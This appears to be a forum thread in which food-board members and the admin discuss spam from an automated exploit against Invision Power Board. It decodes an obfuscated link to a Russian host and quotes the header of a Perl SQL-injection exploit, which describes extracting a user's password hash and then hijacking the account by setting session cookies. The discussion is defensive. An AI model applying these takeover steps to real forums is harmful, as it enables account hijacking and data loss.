(This is from the "General Food Chatter" thread)



This is not a good thing.

The "chr" values translate to:

h t t p : / / r s t . v o i d . r u / r 5 7 i p b i n c . t x t

(I added spaces between each character so it wouldn't generate a clickable link.)

Not a good sign, since .ru is Russia, which is where the Russian mafia spends a good part of its time hanging out.

A Google search turns up this.

Its a published exploit to take over "Invision Power Board" message boards. It doesn't seem to be working.

Some sites have a picture of some random numbers or letters that are distorted and wavey that you have to read and type in to prove you are a person (not a 'bot) when you register for an ID.

Does this board support that?

Man, I hate those posts! They're on another board too. This site does make you enter security code numbers, but they don't seem to be distorted. They don't seem that secure to me.

Maybe this explains why I couldn't post to the Recipes thread tonight?

Cher

I googled "justxpl" and found several hits about this. It looks like this started as a "proof of concept" (POC) script to exploit a security hole in Invision Power Board, v2.1.5 or earlier. POC exploits are usually harmless. They just do something like leave a message; "yeah this worked" or in the case, a link to the coder's home page - h t t p : / / r s t . v o i d . r u

The fact that the "calling card" displayed as garbage just means that he messed up that part of the script.

"r57" is the nickname of a group of Russian security probers. I couldn't really tell if they are "good-guys" or "bad-guys", but either way, if they publish their exploits then someone will pick them up and add a really nasty payload and then things get damaged or passwords get stolen, etc.

Here is a second-generation exploit I found that appears to enable an outsider to delete others' posts or PMs (this is just the comments at the beginning:

## IPB <=2.1.4 exploit (possibly 2.1.5 too)
## Brought to you by the Ykstortion security team.
##
## The bug is in the pm system so you must have a registered user.
## The exploit will extract a password hash from the forum's data base of
## the target user.
## You need to know the target user's member ID but it's not difficult to
## find out, just look under their avatar next to one of their posts.
## Once you have the hash, simply unset all forum cookies and set
## member_id to the target user's member id and pass_hash to the hash
## obtained from the database by this script.
##
## Usage:
## $ ./ipb
## IPB Forum URL ? forums.example.com/forums
## Your username ? krypt_sk1dd13
## Your pass ? if_your_on_nix_this_gets_hidden
## Target userid ? 3637
##
## Attempting to extract password hash from database...
## 537ab2d5b37ac3a3632f5d06e8e04368
## Hit enter to quit.
##
## Requirements:
## o Perl 5
## o LWP 5.64 or later
## o Internet access
## o A forum you hate/dislike
## o A user on said forum
## o 32+ PMs left till your inbox is full, if not you can still delete
## PMs from your inbox as the successful ones come through
##
## Credit to: Nuticulus for finding the SQL injection
##
## Have fun, you dumb skiddie.
##

Judging from that last bit, it allows you to target a specific member and delete his/her PMs.

(A "hash" is the way a password is stored internally in the message board's database.)

The original script (the one we got hit with) appeared to scout around the Internet looking for hackable message boards, set up a member ID, post the "calling card", then report back to the script kiddie what board it found, what member ID it created, and the password it used to create the member ID.

I know this is a big headache for Drew, but the new accounts that this script creates should be deleted and Invision should be asked to provide a patch for this. (I thought I saw another junk post a week or two ago - this exploit was published on 4/26 or 4/28.)

I'm working on solving this pesky issue. I've got an update to the forum software that I'm waiting to install. I'm not sure if it fixes things, but it cannot hurt.

Stay tuned; until the fix is applied, please let me know when you see those spammy posts.

Thanks Drew. Let's all cross our fingers and hope that it works.